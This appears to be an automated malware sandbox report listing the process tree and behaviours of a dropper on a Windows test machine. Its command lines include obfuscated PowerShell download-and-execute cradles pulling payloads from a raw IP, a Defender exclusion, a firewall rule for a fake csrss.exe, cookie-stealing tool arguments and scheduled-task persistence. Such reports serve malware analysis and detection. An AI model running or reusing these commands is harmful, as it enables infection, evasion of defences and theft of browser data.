5320	UkPQqosaxZEWN_UuknyJ6RgF.exe
5168	YStoivV3td8fghxqUu2SgpQ_.exe
5304	LPej8ron26c7SWsJgrCsKxFE.exe
5588	UasdIN9S3pk1MBF6e1GkKLMu.exe
5216	y8vAvBD8LNXIpwE1EDcwkL93.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exeFiles.exemsedge.exeFolder.exeInstall.exe

description	pid	process	target process
PID 2256 wrote to memory of 3380	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Files.exe
PID 2256 wrote to memory of 3380	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Files.exe
PID 2256 wrote to memory of 3380	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Files.exe
PID 2256 wrote to memory of 4556	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	KRSetp.exe
PID 2256 wrote to memory of 4556	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	KRSetp.exe
PID 2256 wrote to memory of 388	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Install.exe
PID 2256 wrote to memory of 388	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Install.exe
PID 2256 wrote to memory of 388	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Install.exe
PID 3380 wrote to memory of 4056	3380	Files.exe	jfiag3g_gg.exe
PID 3380 wrote to memory of 4056	3380	Files.exe	jfiag3g_gg.exe
PID 3380 wrote to memory of 4056	3380	Files.exe	jfiag3g_gg.exe
PID 2256 wrote to memory of 3696	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	msedge.exe
PID 2256 wrote to memory of 3696	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	msedge.exe
PID 2256 wrote to memory of 4600	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Folder.exe
PID 2256 wrote to memory of 4600	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Folder.exe
PID 2256 wrote to memory of 4600	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Folder.exe
PID 2256 wrote to memory of 3232	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Info.exe
PID 2256 wrote to memory of 3232	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Info.exe
PID 2256 wrote to memory of 3232	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Info.exe
PID 3696 wrote to memory of 4608	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 4608	3696	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4252	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Install_Files.exe
PID 2256 wrote to memory of 4252	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Install_Files.exe
PID 2256 wrote to memory of 4252	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Install_Files.exe
PID 2256 wrote to memory of 4784	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	pub2.exe
PID 2256 wrote to memory of 4784	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	pub2.exe
PID 2256 wrote to memory of 4784	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	pub2.exe
PID 2256 wrote to memory of 4704	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	jamesdirect.exe
PID 2256 wrote to memory of 4704	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	jamesdirect.exe
PID 2256 wrote to memory of 4704	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	jamesdirect.exe
PID 2256 wrote to memory of 4312	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Litever01.exe
PID 2256 wrote to memory of 4312	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Litever01.exe
PID 2256 wrote to memory of 4312	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Litever01.exe
PID 2256 wrote to memory of 1440	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Complete.exe
PID 2256 wrote to memory of 1440	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Complete.exe
PID 2256 wrote to memory of 1440	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	Complete.exe
PID 2256 wrote to memory of 1756	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	md9_1sjm.exe
PID 2256 wrote to memory of 1756	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	md9_1sjm.exe
PID 2256 wrote to memory of 1756	2256	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe	md9_1sjm.exe
PID 4600 wrote to memory of 4072	4600	Folder.exe	msedge.exe
PID 4600 wrote to memory of 4072	4600	Folder.exe	msedge.exe
PID 4600 wrote to memory of 4072	4600	Folder.exe	msedge.exe
PID 388 wrote to memory of 4868	388	Install.exe	cmd.exe
PID 388 wrote to memory of 4868	388	Install.exe	cmd.exe
PID 388 wrote to memory of 4868	388	Install.exe	cmd.exe
PID 3380 wrote to memory of 4980	3380	Files.exe	jfiag3g_gg.exe
PID 3380 wrote to memory of 4980	3380	Files.exe	jfiag3g_gg.exe
PID 3380 wrote to memory of 4980	3380	Files.exe	jfiag3g_gg.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 684	3696	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
"C:\Users\Admin\AppData\Local\Temp\8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2256

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3380

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4056

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4980

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:388

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:4868

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf89e46f8,0x7ffbf89e4708,0x7ffbf89e4718
3⤵
PID:4608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
3⤵
PID:684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
3⤵
PID:3124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
3⤵
PID:1352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
3⤵
PID:2276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 /prefetch:8
3⤵
PID:1660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
3⤵
- Executes dropped EXE
PID:4072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
3⤵
PID:3504

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
PID:5852

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff602625460,0x7ff602625470,0x7ff602625480
4⤵
PID:3616

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1264 /prefetch:8
3⤵
PID:7084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6296 /prefetch:2
3⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4600

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
PID:4072

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3232

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
PID:3512

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:228

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:5736

C:\Users\Admin\AppData\Local\Temp\Install_Files.exe
"C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4252

C:\Users\Admin\Documents\8xQttYQw__jO6jcZPLtfAve5.exe
"C:\Users\Admin\Documents\8xQttYQw__jO6jcZPLtfAve5.exe"
3⤵
PID:6916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:6376

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:7380

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:5516

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:7820

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:3580

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Users\Admin\Documents\OsRbtAhgMZlouovOA63p_7CS.exe
"C:\Users\Admin\Documents\OsRbtAhgMZlouovOA63p_7CS.exe"
3⤵
PID:7000

C:\Users\Admin\AppData\Local\Temp\34a5e036-8ebc-4164-b01e-fc5333118faa.exe
"C:\Users\Admin\AppData\Local\Temp\34a5e036-8ebc-4164-b01e-fc5333118faa.exe"
4⤵
PID:7700

C:\Users\Admin\Documents\3LYRJa_h21qcP23mkEqZVhGK.exe
"C:\Users\Admin\Documents\3LYRJa_h21qcP23mkEqZVhGK.exe"
3⤵
PID:6780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 616
4⤵
- Program crash
PID:8108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 636
4⤵
- Program crash
PID:6392

C:\Users\Admin\Documents\eoUnH76y_45c6j6dcX8_bGA7.exe
"C:\Users\Admin\Documents\eoUnH76y_45c6j6dcX8_bGA7.exe"
3⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\7zS49D3.tmp\Install.exe
.\Install.exe
4⤵
PID:7804

C:\Users\Admin\AppData\Local\Temp\7zS7529.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:3424

C:\Users\Admin\Documents\QbzwuFXxEJB1z9zPyT5N7oVX.exe
"C:\Users\Admin\Documents\QbzwuFXxEJB1z9zPyT5N7oVX.exe"
3⤵
PID:1588

C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe
"C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"
3⤵
PID:5576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe" -Force
4⤵
PID:8096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe" -Force
4⤵
PID:6728

C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe
"C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"
4⤵
PID:7200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1420
5⤵
- Program crash
PID:8148

C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe
"C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe"
3⤵
PID:6592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pxsqodyn.exe" C:\Windows\SysWOW64\snwpteqq\
4⤵
PID:7936

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\pxsqodyn.exe /d\"C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe\""
4⤵
PID:6236

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start snwpteqq
4⤵
PID:6112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4745.bat" "
4⤵
PID:8048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 1272
4⤵
- Program crash
PID:772

C:\Users\Admin\Documents\kv93OZJK9SMSrQ5lj2ktTVeO.exe
"C:\Users\Admin\Documents\kv93OZJK9SMSrQ5lj2ktTVeO.exe"
3⤵
PID:5764

C:\Users\Admin\Documents\s7PsoPAUXK8A7maG9KixPMeB.exe
"C:\Users\Admin\Documents\s7PsoPAUXK8A7maG9KixPMeB.exe"
3⤵
PID:4728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:6556

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:1480

C:\Users\Admin\Documents\BKq0ajiZJzEbtqBPqp6wgyDQ.exe
"C:\Users\Admin\Documents\BKq0ajiZJzEbtqBPqp6wgyDQ.exe"
3⤵
PID:2408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:2824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:2016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:7316

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7316" "2120" "2160" "2212" "0" "0" "2216" "0" "0" "0" "0" "0"
5⤵
PID:820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:7608

C:\Users\Admin\Documents\onGvjMU2m141G5PV7GmGrEm_.exe
"C:\Users\Admin\Documents\onGvjMU2m141G5PV7GmGrEm_.exe"
3⤵
PID:6556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 472
4⤵
- Program crash
PID:7896

C:\Users\Admin\Documents\QnI7RpUVX7ROr0hQDhUrsLCG.exe
"C:\Users\Admin\Documents\QnI7RpUVX7ROr0hQDhUrsLCG.exe"
3⤵
PID:6252

C:\Users\Admin\Documents\WjDle5eyOc3IUP8D91U974yX.exe
"C:\Users\Admin\Documents\WjDle5eyOc3IUP8D91U974yX.exe"
3⤵
PID:4500

C:\Users\Admin\Documents\tFapeliATlitnaPwSm6XyzKg.exe
"C:\Users\Admin\Documents\tFapeliATlitnaPwSm6XyzKg.exe"
3⤵
PID:6972

C:\Users\Admin\Documents\3TMzwVzv2jTxn7kvP1onmpZ_.exe
"C:\Users\Admin\Documents\3TMzwVzv2jTxn7kvP1onmpZ_.exe"
3⤵
PID:6964

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4220

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5336

C:\Users\Admin\Documents\X7PsIcqFEwOeJ8J1mHuG8tkH.exe
"C:\Users\Admin\Documents\X7PsIcqFEwOeJ8J1mHuG8tkH.exe"
4⤵
PID:7324

C:\Users\Admin\Pictures\Adobe Films\yEh1fHbg0KS9MoIqM_RZb1ql.exe
"C:\Users\Admin\Pictures\Adobe Films\yEh1fHbg0KS9MoIqM_RZb1ql.exe"
5⤵
PID:5388

C:\Users\Admin\Pictures\Adobe Films\1GZC719qoMDYIcm4jeh_X6ZB.exe
"C:\Users\Admin\Pictures\Adobe Films\1GZC719qoMDYIcm4jeh_X6ZB.exe"
5⤵
PID:7228

C:\Users\Admin\Pictures\Adobe Films\oIFkiwq3aVOYs7QIoaGhfkcL.exe
"C:\Users\Admin\Pictures\Adobe Films\oIFkiwq3aVOYs7QIoaGhfkcL.exe"
5⤵
PID:4504

C:\Users\Admin\Pictures\Adobe Films\__2y_sbBF_l0QMkjWV41ogTS.exe
"C:\Users\Admin\Pictures\Adobe Films\__2y_sbBF_l0QMkjWV41ogTS.exe"
5⤵
PID:3064

C:\Users\Admin\Pictures\Adobe Films\MUyura5UTrq9ndaOYIIYsVtE.exe
"C:\Users\Admin\Pictures\Adobe Films\MUyura5UTrq9ndaOYIIYsVtE.exe"
5⤵
PID:5716

C:\Users\Admin\Pictures\Adobe Films\8toxyvMY5eftDXbfHZ5Nkspi.exe
"C:\Users\Admin\Pictures\Adobe Films\8toxyvMY5eftDXbfHZ5Nkspi.exe"
5⤵
PID:7180

